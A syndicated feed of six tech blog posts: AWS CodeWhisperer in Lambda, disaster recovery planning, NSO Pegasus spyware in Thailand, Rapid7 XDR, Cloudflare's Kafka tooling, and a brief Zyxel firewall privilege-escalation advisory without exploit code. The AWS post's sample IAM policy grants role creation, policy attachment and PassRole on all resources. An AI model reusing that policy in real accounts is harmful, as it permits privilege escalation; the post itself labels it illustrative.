Introducing Amazon CodeWhisperer in the AWS Lambda console (In preview)

Post Syndicated from Julian Wood original https://aws.amazon.com/blogs/compute/introducing-amazon-codewhisperer-in-the-aws-lambda-console-in-preview/

This blog post is written by Mark Richman, Senior Solutions Architect.

Today, AWS is launching a new capability to integrate the Amazon CodeWhisperer experience with the AWS Lambda console code editor.

Amazon CodeWhisperer is a machine learning (ML)–powered service that helps improve developer productivity. It generates code recommendations for developers based on their comments written in natural language and their existing code.

CodeWhisperer is available as part of the AWS toolkit extensions for major IDEs, including JetBrains, Visual Studio Code, and AWS Cloud9, currently supporting Python, Java, and JavaScript. In the Lambda console, CodeWhisperer is available as a native code suggestion feature, which is the focus of this blog post.

CodeWhisperer is currently available in preview with a waitlist. This blog post explains how to request access to and activate CodeWhisperer for the Lambda console. Once activated, CodeWhisperer can make code recommendations on-demand in the Lambda code editor as you develop your function. During the preview period, developers can use CodeWhisperer at no cost.

Amazon CodeWhisperer

Lambda is a serverless compute service that runs your code in response to events and automatically manages the underlying compute resources for you. You can trigger Lambda from over 200 AWS services and software as a service (SaaS) applications and only pay for what you use.

With Lambda, you can build your functions directly in the AWS Management Console and take advantage of CodeWhisperer integration. CodeWhisperer in the Lambda console currently supports functions using the Python and Node.js runtimes.

When writing AWS Lambda functions in the console, CodeWhisperer analyzes the code and comments, determines which cloud services and public libraries are best suited for the specified task, and recommends a code snippet directly in the source code editor. The code recommendations provided by CodeWhisperer are based on ML models trained on a variety of data sources, including Amazon and open source code. Developers can accept the recommendation or simply continue to write their own code.

Requesting CodeWhisperer access

CodeWhisperer integration with Lambda is currently available as a preview only in the N. Virginia (us-east-1) Region. To use CodeWhisperer in the Lambda console, you must first sign up to access the service in preview here or request access directly from within the Lambda console.

In the AWS Lambda console, under the Code tab, in the Code source editor, select the Tools menu, and then choose Request Amazon CodeWhisperer Access.

Request CodeWhisperer access in Lambda console

You may also request access from the Preferences pane.

Request CodeWhisperer access in Lambda console preference pane

Selecting either of these options opens the sign-up form.

CodeWhisperer sign up form

Enter your contact information, including your AWS account ID. This is required to enable the AWS Lambda console integration. You will receive a welcome email from the CodeWhisperer team once they approve your request.

Activating Amazon CodeWhisperer in the Lambda console

Once AWS enables your preview access, you must turn on the CodeWhisperer integration in the Lambda console, and configure the required permissions.

From the Tools menu, enable Amazon CodeWhisperer Code Suggestions.

Enable CodeWhisperer code suggestions

You can also enable code suggestions from the Preferences pane:

Enable CodeWhisperer code suggestions from Preferences pane

The first time you activate CodeWhisperer, you see a pop-up containing terms and conditions for using the service.

CodeWhisperer Preview Terms

Read the terms and conditions and choose Accept to continue.

AWS Identity and Access Management (IAM) permissions

For CodeWhisperer to provide recommendations in the Lambda console, you must enable the proper AWS Identity and Access Management (IAM) permissions for either your IAM user or role. In addition to Lambda console editor permissions, you must add the codewhisperer:GenerateRecommendations permission.

Here is a sample IAM policy that grants a user permission to the Lambda console as well as CodeWhisperer:

{
  "Version": "2012-10-17",
  "Statement": [{
      "Sid": "LambdaConsolePermissions",
      "Effect": "Allow",
      "Action": [
        "lambda:AddPermission",
        "lambda:CreateEventSourceMapping",
        "lambda:CreateFunction",
        "lambda:DeleteEventSourceMapping",
        "lambda:GetAccountSettings",
        "lambda:GetEventSourceMapping",
        "lambda:GetFunction",
        "lambda:GetFunctionCodeSigningConfig",
        "lambda:GetFunctionConcurrency",
        "lambda:GetFunctionConfiguration",
        "lambda:InvokeFunction",
        "lambda:ListEventSourceMappings",
        "lambda:ListFunctions",
        "lambda:ListTags",
        "lambda:PutFunctionConcurrency",
        "lambda:UpdateEventSourceMapping",
        "iam:AttachRolePolicy",
        "iam:CreatePolicy",
        "iam:CreateRole",
        "iam:GetRole",
        "iam:GetRolePolicy",
        "iam:ListAttachedRolePolicies",
        "iam:ListRolePolicies",
        "iam:ListRoles",
        "iam:PassRole",
        "iam:SimulatePrincipalPolicy"
      ],
      "Resource": "*"
    },
    {
      "Sid": "CodeWhispererPermissions",
      "Effect": "Allow",
      "Action": ["codewhisperer:GenerateRecommendations"],
      "Resource": "*"
    }
  ]
}

This example is for illustration only. As a best practice, use IAM policies that grant each principal only the permissions it needs, in line with least privilege standards.

Demo

To activate and work with code suggestions, use the following keyboard shortcuts:

  • Manually fetch a code suggestion: Option+C (macOS), Alt+C (Windows)
  • Accept a suggestion: Tab
  • Reject a suggestion: press ESC or Backspace, scroll in any direction, or keep typing; the recommendation automatically disappears.

Currently, the IDE extensions provide automatic suggestions and can show multiple suggestions. The Lambda console integration requires a manual fetch and shows a single suggestion.

Here are some common ways to use CodeWhisperer while authoring Lambda functions.

Single-line code completion

When typing single lines of code, CodeWhisperer suggests how to complete the line.

CodeWhisperer single-line completion
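
As a rough illustration of what this looks like, here is a hypothetical Python example (not a capture of the console) that assumes a function using boto3:

import boto3

# Typing the start of a line such as "s3_client = ", CodeWhisperer might
# suggest completing it to:
s3_client = boto3.client("s3")

# Typing "buckets = s3_client.list_", it might complete the API call:
buckets = s3_client.list_buckets()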

Full function generation

CodeWhisperer can generate an entire function based on your function signature or code comments. In the following example, a developer has written a function signature for reading a file from Amazon S3. CodeWhisperer then suggests a full implementation of the read_from_s3 method.

CodeWhisperer full function generation

CodeWhisperer may include import statements as part of its suggestions, as in the previous example. As a best practice to improve performance, manually move these import statements outside the function handler.
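
As a hedged sketch of what an accepted read_from_s3 suggestion might look like after that refactoring, assuming a boto3-based implementation (the exact code CodeWhisperer generates will differ):

import boto3

# Imports and client creation sit at module level so they run once per
# execution environment rather than on every invocation.
s3_client = boto3.client("s3")


def read_from_s3(bucket, key):
    """Return the body of an S3 object as a string."""
    response = s3_client.get_object(Bucket=bucket, Key=key)
    return response["Body"].read().decode("utf-8")


def lambda_handler(event, context):
    # Event fields shown here are illustrative.
    content = read_from_s3(event["bucket"], event["key"])
    return {"statusCode": 200, "body": content}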

Generate code from comments

CodeWhisperer can also generate code from comments. The following example shows how CodeWhisperer generates code to use AWS APIs to upload files to Amazon S3. Write a comment describing the intended functionality and, on the following line, activate the CodeWhisperer suggestions. Given the context from the comment, CodeWhisperer first suggests the function signature code in its recommendation.

CodeWhisperer generate function signature code from comments

After you accept the function signature, CodeWhisperer suggests the rest of the function code.

CodeWhisperer generate function code from comments

When you accept the suggestion, CodeWhisperer completes the entire code block.

CodeWhisperer generates code to write to S3.
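
A minimal sketch of the kind of code this comment-driven flow can produce, again assuming boto3 (the function name and parameters are illustrative, not a transcript of the console):

import boto3

s3_client = boto3.client("s3")


# Function to upload a file to an S3 bucket
def upload_to_s3(file_name, bucket, key):
    """Upload a local file to the given bucket and object key."""
    s3_client.upload_file(file_name, bucket, key)


# Example usage:
# upload_to_s3("report.csv", "example-bucket", "reports/report.csv")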

CodeWhisperer can help write code that accesses many other AWS services. In the following example, a code comment indicates that a function is sending a notification using Amazon Simple Notification Service (SNS). Based on this comment, CodeWhisperer suggests a function signature.

CodeWhisperer function signature for SNS

If you accept the suggested function signature, CodeWhisperer suggests a complete implementation of the send_notification function.

CodeWhisperer function send notification for SNS
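
A sketch of what the completed send_notification implementation might resemble, using boto3's SNS client (the topic ARN and parameters are placeholders):

import boto3

sns_client = boto3.client("sns")


# Function to send a notification to an SNS topic
def send_notification(topic_arn, message, subject):
    """Publish a message to the given SNS topic and return its ID."""
    response = sns_client.publish(
        TopicArn=topic_arn,
        Message=message,
        Subject=subject,
    )
    return response["MessageId"]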

The same procedure works with Amazon DynamoDB. When you write a code comment indicating that the function should get an item from a DynamoDB table, CodeWhisperer suggests a function signature.

CodeWhisperer DynamoDB function signature

When you accept the suggestion, CodeWhisperer then suggests a full code snippet to complete the implementation.

CodeWhisperer DynamoDB code snippet

After reviewing the suggestion, a common refactoring step in this example is to move the references to the DynamoDB resource and table outside the get_item function.
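
A sketch of that refactored result, assuming the boto3 DynamoDB resource API (the table name and key attribute are illustrative):

import boto3

# Moved outside the function so the resource and table are created once per
# execution environment rather than on every call.
dynamodb = boto3.resource("dynamodb")
table = dynamodb.Table("example-table")


# Function to get an item from a DynamoDB table
def get_item(item_id):
    """Fetch a single item by its partition key."""
    response = table.get_item(Key={"id": item_id})
    return response.get("Item")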

CodeWhisperer can also recommend complex algorithm implementations, such as insertion sort.

CodeWhisperer insertion sort.
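
For reference, a straightforward insertion sort in Python looks like the following (the details of a generated version may differ):

def insertion_sort(values):
    """Sort a list in place using insertion sort and return it."""
    for i in range(1, len(values)):
        current = values[i]
        j = i - 1
        # Shift larger elements one position to the right.
        while j >= 0 and values[j] > current:
            values[j + 1] = values[j]
            j -= 1
        values[j + 1] = current
    return values


print(insertion_sort([5, 2, 4, 6, 1, 3]))  # [1, 2, 3, 4, 5, 6]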

As a best practice, always test the code recommendation for completeness and correctness.

CodeWhisperer not only provides suggested code snippets when integrating with AWS APIs, but can also help you implement common programming idioms, including proper error handling.

Conclusion

CodeWhisperer is a general purpose, machine learning-powered code generator that provides you with code recommendations in real time. When activated in the Lambda console, CodeWhisperer generates suggestions based on your existing code and comments, helping to accelerate your application development on AWS.

To get started, visit https://aws.amazon.com/codewhisperer/. Share your feedback with us at [email protected].

For more serverless learning resources, visit Serverless Land.

Server Backup 101: Disaster Recovery Planning

Post Syndicated from Kari Rivas original https://www.backblaze.com/blog/server-backup-101-disaster-recovery-planning/

In any business, time is money. What may shock you is how much money that time is actually worth. According to Gartner, the average cost of downtime for a business is roughly $5,600 a minute, which works out to more than $300,000 an hour. Multiply that out by the amount of time it takes to recover from data theft, sabotage, or a natural disaster, and you could easily be looking at millions of dollars in lost revenue. That is, unless you’ve planned ahead with an effective disaster recovery plan.

Even one hour of lost time due to a cyberattack or natural disaster could adversely affect your business operations. Read on to learn how to develop an effective disaster recovery plan so you can quickly rebound no matter what happens, including:

  • Knowing what a disaster recovery plan is and why you need it.
  • Developing an effective strategy.
  • Identifying key roles.
  • Prioritizing business operations and objectives.
  • Deploying backups.

What Is a Disaster Recovery Plan?

A disaster recovery plan is made up of resources and processes that a business can use to restore apps, data, digital assets, equipment, and network operations in the event of any unplanned disruption.

Events such as natural disasters (floods, fires, earthquakes, etc.), theft, and cybercrime often interrupt business operations or restrict access to data. The goal of a disaster recovery plan is to get back up and running as quickly and smoothly as possible.

Some companies will choose to write their own disaster recovery plans, while others may contract with a managed service provider (MSP) specializing in disaster recovery as a service (DRaaS). Either way, crafting a disaster recovery plan that covers you for any contingency is crucial.

Why Do You Need a Disaster Recovery Plan?

A disaster recovery plan is not just a good idea, it is an essential component of your business. Cybercrime is on the rise, targeting small and medium-sized businesses just as often as large corporations. According to Cybersecurity Magazine, 43% of recent data breaches affected small and medium-sized businesses. Additionally, you could be cut off from your data by power outages, hardware failure, data corruption, and natural occurrences that restrict IT workflows. So, why do you need a disaster recovery plan? A few key benefits rise to the top:

  • Your disaster recovery plan will ensure business continuity in the case of a disaster. Imagine the confidence of knowing that no matter what happens, your business is prepared and can continue operations seamlessly.
  • An effective disaster recovery plan will help you get back up and running faster and more efficiently.
  • The plan also helps to communicate to your entire team, from top to bottom, what to do in the event of an emergency.

Writing a Disaster Recovery Plan: What Should Your Disaster Recovery Plan Include?

A solid disaster recovery plan should include five main elements, which we’ll detail below:

  1. An effective strategy.
  2. Key team members who can carry out the plan.
  3. Clear objectives and priorities.
  4. Solid backups.
  5. Testing protocols.

An Effective Strategy

One of the most critical aspects of your disaster recovery plan should be your strategy. Typically, the details of a disaster recovery plan include steps for prevention, preparation, mitigation, and recovery. Think about both the big picture and fine details when putting together the pieces.

Disaster Recovery Planning Case Study: Santa Cruz Skateboards

Santa Cruz Skateboards safeguarded decades worth of data with a disaster recovery plan and backups to prevent loss from the threat of tsunamis on the California coast. Read more about how they did it.

Some tips for creating an effective strategy include:

  • Identify possible disasters. Consider the types of disasters your business may encounter and design your plan around those. Every business is susceptible to cybercrime, which should be a significant component of your plan. If your business is in a disaster-prone area, let that shape your plan objectives.
  • Plan for “minor” disasters. A “major” disaster like an earthquake could take out the entire office and on-premises infrastructure, but “minor” disasters can also be disruptive. Good employees make mistakes and delete things, and bad employees sometimes make worse mistakes. A disaster recovery plan protects you from those “minor” disasters as well.
  • Create multiple disaster recovery plans. You may need to create different versions of your disaster recovery plan based on specific scenarios and the severity of the disaster. For example, you may need a plan that responds to a cyberattack and restores data quickly, while another plan may deal with hardware destruction and replacement rather than data restoration.
  • Plan from your recovery backward. Think about what you need to accomplish with your disaster recovery and plan your backup routine to support it. Then, after your plan is written, go back and ensure that your backup routine follows the plan initiatives and accomplishes the goals in an acceptable time frame.
  • Develop KPIs. Include critical key performance indicators (KPIs) in the plan, such as a recovery time objective (RTO) and recovery point objective (RPO). RTO refers to how quickly you intend to restore your systems after a disaster, and RPO is the maximum amount of data loss you can safely incur.

Establish the Key Team Members and Their Roles and Hierarchy

Another crucial component of your disaster recovery plan is identifying key team members to carry out the instructions. You must clearly define roles and hierarchy for effectiveness. Consider the following when building your disaster recovery team:

  • Communicate roles and hierarchy. Ensure that each team member knows their role in the plan and understands where they land in the hierarchy. Build in redundancy in case a major player is unavailable.
  • Develop a master contact list. Create a master list with updated contact information for each team member and update it regularly as things change. Be sure the list includes everyone’s cell phone and landline numbers (if applicable) and emergency contacts for each person. Don’t assume you will have working internet and consider alternative ways to reach critical team members in the middle of the night.
  • Plan on how to manage your team. Think about how you will stay organized and manage your team to function 24/7 until you resolve the disaster.

Prioritize Business Operations and Objectives

Another important aspect of your disaster recovery plan is prioritizing business operations and objectives and crafting your plan around those.

Identify the most critical aspects of the business that need to be restored first. Then, focus on those and leave the less essential things until later. Understand that it is not feasible to restore everything at once. Instead, prioritize the most critical business areas, get those up and running, and then move on to the other, less crucial parts of the system. Detail these priorities in your plan so that no one wastes time on nonessential operations.

Know How to Deploy Your Backups

Backups should be a routine function for your organization, and you should know them inside and out. Be sure to familiarize yourself with every aspect of the backup process, including where data is stored, how recent it is, and how to restore it at a moment’s notice.

Having a reliable backup plan could save your business. You don’t want to waste precious time figuring out where the latest backup is, where it’s stored (whether that’s locally or on the cloud), or how to access it. Off-site cloud storage is a safe, reliable way to store and retrieve your data, especially in the event of a disaster.

Practice restoring your backups regularly to test their viability. Document the process for restoring in case you are unavailable and someone else has to take over. Data restoration should be a central part of your disaster recovery plan. Remember, backups are not your entire disaster recovery plan but only a piece of the overall system.

Foolproof Your Plan With Disaster Recovery Testing

The best-laid plans don’t always work out. Therefore, it’s essential that you foolproof your disaster recovery plan by testing it regularly (once a year, or every six months, whatever works for you). You don’t have to experience a real catastrophe; you can simulate what a disaster would look like and run through the entire process to ensure everything works as expected. Some disaster recovery testing best practices include:

  • Planning for the worst-case scenario. Think about things like whether you will have access to a car, how you will get to the office, and how you will access your backups if they are stored online and you don’t have internet. Prepare by having multiple alternate plans (A, B, C, etc.). Remember, disasters come in all shapes and sizes, so be prepared to think outside the box. When the COVID-19 pandemic started, businesses had to scramble to adjust. Prepare for anything, even minor disruptions or being cut off from resources you rely on.
  • Securing resources in advance. If you need resources to make it work, such as budgetary funds, software, hardware, or services, get those approved now so you’re not stuck provisioning necessary resources in the middle of a disaster.
  • Regularly reviewing and updating your disaster recovery plan as things change. Team members come and go, so schedule routine updates every three to six months to ensure that everything is up to date and viable.
  • Distributing copies of your disaster recovery plan. All staff members, including executives, should have a copy of your plan, and you should clearly communicate how it works and what everyone’s responsibility is.
  • Conducting post mortems after training and simulations (or a real disaster) to determine what works and what doesn’t. Make changes to your plan accordingly.

Don’t wait until a disaster occurs before writing your disaster recovery plan. A disaster recovery plan is an ever-evolving process you must maintain as the business changes and grows so you can face anything that the future brings.

Disaster Recovery, Done.

Ready to check disaster recovery off your list? Check out our Instant Recovery in Any Cloud solution that you can use as part of your disaster recovery plan. You can run a single command to instantly see your servers, data, firewalls, and network storage. Get back up and running as soon as possible with minimal disruption and expense to your business.

The post Server Backup 101: Disaster Recovery Planning appeared first on Backblaze Blog | Cloud Storage & Cloud Backup.

NSO Group’s Pegasus Spyware Used against Thailand Pro-Democracy Activists and Leaders

Post Syndicated from Bruce Schneier original https://www.schneier.com/blog/archives/2022/07/nso-groups-pegasus-spyware-used-against-thailand-pro-democracy-activists-and-leaders.html

Yet another basic human rights violation, courtesy of NSO Group: Citizen Lab has the details:

Key Findings

  • We discovered an extensive espionage campaign targeting Thai pro-democracy protesters, and activists calling for reforms to the monarchy.
  • We forensically confirmed that at least 30 individuals were infected with NSO Group’s Pegasus spyware.
  • The observed infections took place between October 2020 and November 2021.
  • The ongoing investigation was triggered by notifications sent by Apple to Thai civil society members in November 2021. Following the notification, multiple recipients made contact with civil society groups, including the Citizen Lab.
  • The report describes the results of an ensuing collaborative investigation by the Citizen Lab, and Thai NGOs iLaw, and DigitalReach.
  • A sample of the victims was independently analyzed by Amnesty International’s Security Lab which confirms the methodology used to determine Pegasus infections.

[…]

NSO Group has denied any wrongdoing and maintains that its products are to be used “in a legal manner and according to court orders and the local law of each country.” This justification is problematic, given the presence of local laws that infringe on international human rights standards and the lack of judicial oversight, transparency, and accountability in governmental surveillance, which could result in abuses of power. In Thailand, for example, Section 112 of the Criminal Code (also known as the lèse-majesté law), which criminalizes defamation, insults, and threats to the Thai royal family, has been criticized for being “fundamentally incompatible with the right to freedom of expression,” while the amended Computer Crime Act opens the door to potential rights violations, as it “gives overly broad powers to the government to restrict free speech [and] enforce surveillance and censorship.” Both laws have been used in concert to prosecute lawyers and activists, some of whom were targeted with Pegasus.

More details. News articles.

A few months ago, Ronan Farrow wrote a really good article on NSO Group and its problems. The company was itself hacked in 2021.

L3Harris Corporation was looking to buy NSO Group, but dropped its bid after the Biden administration expressed concerns. The US government blacklisted NSO Group last year, and the company is even more toxic than it was as a result—and a mess internally.

In another story, the nephew of the jailed Hotel Rwanda dissident was also hacked by Pegasus.

EDITED TO ADD (7/28): The House Intelligence Committee held hearings on what to do about this rogue industry. It’s important to remember that while NSO Group gets all the heat, there are many other companies that do the same thing.

John Scott-Railton at the hearing:

If NSO Group goes bankrupt tomorrow, there are other companies, perhaps seeded with U.S. venture capital, that will attempt to step in to fill the gap. As long as U.S. investors see the mercenary spyware industry as a growth market, the U.S. financial sector is poised to turbocharge the problem and set fire to our collective cybersecurity and privacy.

Gimme! Gimme! Gimme! (More Data): What Security Pros Are Saying

Post Syndicated from Dina Durutlic original https://blog.rapid7.com/2022/07/19/gimme-gimme-gimme-more-data-what-security-pros-are-saying/

In a new ebook sponsored by Rapid7, SOC Modernization and the Role of XDR, ESG found that eight in 10 organizations collect, process, and analyze security operations data from more than 10 sources. Security professionals believe that the most important sources are endpoint security data (24%), threat intelligence feeds (21%), security device logs (20%), cloud posture management data (20%), and network flow logs (18%).

While this seems like a lot of data, survey respondents actually want to use more data for security operations in order to keep up with the proliferation of the attack surface. This expansion is driving the need for scalable, high-performance, cloud-based back-end data repositories.

More data, more noise

Organizations are increasingly investing in technology to achieve executive goals and deliver on digital transformation strategies – every company is becoming a software company in order to remain competitive and support the new work normal.

With more technology comes greater potential for vulnerabilities and threats. Security operations center (SOC) analysts are an organization’s first line of defense. In order to effectively stay ahead of potential threats and attacks, security teams rely on vast amounts of data to get an overview of the organization and ensure protection of any vulnerabilities or threats.

However, it’s nearly impossible for organizations to prioritize and mitigate hundreds of risks effectively – and not just due to the skilled resource and knowledge shortage. Security teams need to filter through the noise and identify the right data to act on.

“In security, what we don’t look at, don’t listen to, don’t evaluate, and don’t act upon may actually be more important than what we do,” Joshua Goldfarb recently wrote in Dark Reading.

Focus on what matters with stronger signal-to-noise

Though SOC analysts are adept at collecting vast amounts of security data, they face a multitude of challenges in discerning the most severe, imminent threats and responding to them in an effective, timely manner. These teams are inundated with low-fidelity data and bogged down with repetitive tasks dealing with false positives. In order to reduce the noise, security professionals need a good signal-to-noise ratio. They need high-fidelity intelligence, actionable insight, and contextual data to quickly identify and respond to threats.

With Rapid7, organizations can ensure visibility for their security teams, eliminating blindspots and extinguishing threats earlier and faster. InsightIDR, Rapid7’s cloud-native SIEM and XDR, provides SOC analysts with comprehensive detection and response.

With InsightIDR, security professionals can leverage complete coverage with a native endpoint agent, network sensors, collectors, and APIs. Teams can go beyond unifying data to correlate, attribute, and enrich diverse datasets into a single harmonious picture.

  • Detailed events and investigations – Track users and assets as they move around the network, auto-enriching every log line.
  • Correlation across diverse telemetry – Single investigation timeline for each alert, and all the details of an attack in one place.
  • Expert response recommendations – Alerts come with recommended actions from Rapid7’s global MDR SOC and Velociraptor’s digital forensics and incident response playbooks.


Using Apache Kafka to process 1 trillion messages

Post Syndicated from Matt Boyle original https://blog.cloudflare.com/using-apache-kafka-to-process-1-trillion-messages/

Cloudflare has been using Kafka in production since 2014. We have come a long way since then, and currently run 14 distinct Kafka clusters, across multiple data centers, with roughly 330 nodes. Between them, over a trillion messages have been processed over the last eight years.

Cloudflare uses Kafka to decouple microservices and communicate the creation, change or deletion of various resources via a common data format in a fault-tolerant manner. This decoupling is one of many factors that enables Cloudflare engineering teams to work on multiple features and products concurrently.

We learnt a lot about Kafka on the way to one trillion messages and built some interesting internal tools to ease adoption, which will be explored in this blog post. The focus in this blog post is on inter-application communication use cases alone and not logging (we have other Kafka clusters that power the dashboards where customers view statistics, and those clusters handle more than one trillion messages each day). I am an engineer on the Application Services team, and our team has a charter to provide tools and services to product teams so they can focus on their core competency: delivering value to our customers.

In this blog I’d like to recount some of our experiences in the hope that it helps other engineering teams who are on a similar journey of adopting Kafka widely.

Tooling

One of our Kafka clusters is creatively named Messagebus. It is the most general purpose cluster we run, and was created to:

  • Prevent data silos;
  • Enable services to communicate more clearly with basically zero integration cost (more on how we achieved this below);
  • Encourage the use of a self-documenting communication format, thereby removing the problem of out-of-date documentation.

To make it as easy to use as possible and to encourage adoption, the Application Services team created two internal projects. The first is unimaginatively named Messagebus-Client. Messagebus-Client is a Go library that wraps the fantastic Shopify Sarama library with an opinionated set of configuration options and the ability to manage the rotation of mTLS certificates.

The success of this project is also somewhat its downfall. By providing a ready-to-go Kafka client, we ensured teams got up and running quickly, but we also abstracted some core concepts of Kafka a little too much, meaning that small unassuming configuration changes could have a big impact.

One such example led to partition skew (a large portion of messages being directed towards a single partition, meaning we were not processing messages in real time; see the chart below). One drawback of Kafka is that, within a consumer group, only one consumer can read from each partition, so when incidents do occur, you can’t trivially scale your way to faster throughput.
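
Kafka assigns a keyed message to a partition by hashing its key, so a producer that concentrates traffic on one key concentrates it on one partition. The sketch below illustrates the idea in Python with the kafka-python library rather than our Go Messagebus-Client; the broker address and topic are placeholders:

from kafka import KafkaProducer

producer = KafkaProducer(bootstrap_servers="localhost:9092")

# Every message shares the same key, so they all hash to the same partition
# and a single consumer has to absorb the full throughput.
for i in range(1000):
    producer.send("example-topic", key=b"hot-key", value=str(i).encode())

# Spreading messages across distinct keys lets Kafka distribute them across
# partitions, and therefore across the consumers in a group.
for i in range(1000):
    producer.send("example-topic", key=f"user-{i}".encode(), value=str(i).encode())

producer.flush()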

That also means that before your service hits production, it is wise to do some back-of-the-napkin math to figure out what throughput might look like; otherwise, you may need to add partitions later. We have since amended our library to make events like the below less likely.

Using Apache Kafka to process 1 trillion messages

The reception for the Messagebus-Client has been largely positive. We spent time as a team to understand what the predominant use cases were, and took the concept one step further to build out what we call the connector framework.

Connectors

The connector framework is based on Kafka-connectors and allows our engineers to easily spin up a service that can read from a system of record and push it somewhere else (such as Kafka, or even Cloudflare’s own Quicksilver). To make this as easy as possible, we use Cookiecutter templating to allow engineers to enter a few parameters into a CLI and in return receive a ready to deploy service.

We provide the ability to configure data pipelines via environment variables. For simple use cases, we provide the functionality out of the box. However, extending the readers, writers and transformations is as simple as satisfying an interface and “registering” the new entry.

For example, adding the environment variables:

READER=kafka
TRANSFORMATIONS=topic_router:topic1,topic2|pf_edge
WRITER=quicksilver

will:

  • Read messages from Kafka topic “topic1” and “topic2”;
  • Transform the message using a transformation function called “pf_edge” which maps the request from a Kafka protobuf to a Quicksilver request;
  • Write the result to Quicksilver.
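
The connector framework itself is internal, but the "satisfy an interface and register it" pattern it relies on is generic. Here is a minimal, purely illustrative Python sketch of that pattern (not the actual framework code):

# Registries mapping a name (as used in the environment variables) to an
# implementation. Real readers/writers would wrap Kafka, Quicksilver, etc.
READERS = {}
WRITERS = {}


def register_reader(name):
    def wrapper(fn):
        READERS[name] = fn
        return fn
    return wrapper


def register_writer(name):
    def wrapper(fn):
        WRITERS[name] = fn
        return fn
    return wrapper


@register_reader("static")
def read_static():
    return ["message-1", "message-2"]


@register_writer("stdout")
def write_stdout(messages):
    for message in messages:
        print(message)


# The pipeline is assembled from configuration, e.g. READER=static WRITER=stdout.
def run(reader_name, writer_name):
    WRITERS[writer_name](READERS[reader_name]())


run("static", "stdout")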

Connectors come readily baked with basic metrics and alerts, so teams know they can move to production quickly but with confidence.

Below is a diagram of how one team used our connector framework to read from the Messagebus cluster and write to various other systems. This is orchestrated by a system the Application Services team runs called the Communication Preferences Service (CPS). Whenever a user opts in/out of marketing emails or changes their language preferences on cloudflare.com, they are calling CPS, which ensures those settings are reflected in all the relevant systems.

Using Apache Kafka to process 1 trillion messages

Strict Schemas

Alongside the Messagebus-Client library, we also provide a repo called Messagebus Schema. This is a schema registry for all message types that will be sent over our Messagebus cluster. For message format, we use protobuf and have been very happy with that decision. Previously, our team had used JSON for some of our Kafka schemas, but we found it much harder to enforce forward and backwards compatibility, and message sizes were substantially larger than the protobuf equivalent. Protobuf provides strict message schemas (including type safety), the forward and backwards compatibility we desired, and the ability to generate code in multiple languages, and the files are very human-readable.

We encourage heavy commentary before approving a merge. Once merged, we use prototool to do breaking change detection, enforce some stylistic rules and to generate code for various languages (at time of writing it’s just Go and Rust, but it is trivial to add more).

An example Protobuf message in our schema

Furthermore, in Messagebus Schema we store a mapping of proto messages to a team, alongside that team’s chat room in our internal communication tool. This allows us to escalate issues to the correct team easily when necessary.

One important decision we made for the Messagebus cluster is to only allow one proto message per topic. This is configured in Messagebus Schema and enforced by the Messagebus-Client. This was a good decision to enable easy adoption, but it has led to numerous topics existing. When you consider that for each topic we create, we add numerous partitions and replicate them with a replication factor of at least three for resilience, there is a lot of potential to optimize compute for our lower throughput topics.

Observability

Making it easy for teams to observe Kafka is essential for our decoupled engineering model to be successful. We therefore have automated metrics and alert creation wherever we can to ensure that all the engineering teams have a wealth of information available to them to respond to any issues that arise in a timely manner.

We use Salt to manage our infrastructure configuration and follow a GitOps-style model, where our repo holds the source of truth for the state of our infrastructure. To add a new Kafka topic, our engineers make a pull request into this repo and add a couple of lines of YAML. Upon merge, the topic and an alert for high lag (where lag is defined as the difference in time between the last committed offset being read and the last produced offset being produced) will be created. Other alerts can (and should) be created, but this is left to the discretion of application teams. The reason we automatically generate alerts for high lag is that this simple alert is a great proxy for catching a wide range of issues, including:

  • Your consumer isn’t running.
  • Your consumer cannot keep up with the throughput, or an anomalous number of messages is being produced to your topic at this time.
  • Your consumer is misbehaving and not acknowledging messages.

For metrics, we use Prometheus and display them with Grafana. For each new topic created, we automatically provide a view into production rate, consumption rate and partition skew by producer/consumer. If an engineering team is called out, within the alert message is a link to this Grafana view.

Using Apache Kafka to process 1 trillion messages

In our Messagebus-Client, we expose some metrics automatically and users get the ability to extend them further. The metrics we expose by default are:

For producers:

  • Messages successfully delivered.
  • Messages that failed to deliver.

For consumers:

  • Messages successfully consumed.
  • Message consumption errors.

Some teams use these for alerting on a significant change in throughput, others use them to alert if no messages are produced/consumed in a given time frame.
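
The Messagebus-Client is written in Go, so the following is only a hedged Python illustration of the pattern behind those default counters, using prometheus_client with made-up metric names:

from prometheus_client import Counter

# Hypothetical metric names; the real client's names may differ.
MESSAGES_DELIVERED = Counter(
    "messagebus_messages_delivered_total", "Messages successfully delivered"
)
MESSAGES_FAILED = Counter(
    "messagebus_messages_failed_total", "Messages that failed to deliver"
)


def instrumented_produce(send_fn, message):
    """Wrap a send call so every produce attempt updates the counters."""
    try:
        send_fn(message)
        MESSAGES_DELIVERED.inc()
    except Exception:
        MESSAGES_FAILED.inc()
        raise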

A Practical Example

As well as providing the Messagebus framework, the Application Services team looks for common concerns within Engineering and aims to solve them in a scalable, extensible way, so that other engineering teams can utilize the system and not have to build their own (meaning we are not building lots of disparate systems that are only slightly different).

One example is the Alert Notification System (ANS). ANS is the backend service for the “Notifications” tab in the Cloudflare dashboard. You may have noticed over the past 12 months that new alert and policy types have been made available to customers very regularly. This is because we have made it very easy for other teams to do this. The approach is:

  • Create a new entry into ANS’s configuration YAML (We use CUE lang to validate the configuration as part of our continuous integration process);
  • Import our Messagebus-Client into your code base;
  • Emit a message to our alert topic when an event of interest takes place.

That’s it! The producer team now has a means for customers to configure granular alerting policies for their new alert, including the ability to dispatch them via Slack, Google Chat or a custom webhook, PagerDuty, or email (by both API and dashboard). Retrying and dead letter messages are managed for them, and a whole host of metrics are made available, all by making some very small changes.

What’s Next?

Usage of Kafka (and our Messagebus tools) is only going to increase at Cloudflare as we continue to grow, and as a team we are committed to making the tooling around Messagebus easy to use, customizable where necessary and (perhaps most importantly) easy to observe. We regularly take feedback from other engineers to help improve the Messagebus-Client (we are on the fifth version now) and are currently experimenting with abstracting the intricacies of Kafka away completely and allowing teams to use gRPC to stream messages to Kafka. Blog post on the success/failure of this to follow!

If you’re interested in building scalable services and solving interesting technical problems, we are hiring engineers on our team in Austin, and Remote US.

CVE-2022-30526 (Fixed): Zyxel Firewall Local Privilege Escalation

Post Syndicated from Jake Baines original https://blog.rapid7.com/2022/07/19/cve-2022-30526-fixed-zyxel-firewall-local-privilege-escalation/

Rapid7 discovered a local privilege escalation vulnerability affecting Zyxel firewalls. The vulnerability allows a low-privileged user, such as nobody, to escalate to root on affected firewalls. To exploit this vulnerability, a remote attacker must first establish shell access on the firewall, for example by exploiting CVE-2022-30525.

The following models are known to be affected:

  • USG FLEX 100, 100W, 200, 500, 700
  • USG20-VPN, USG20W-VPN
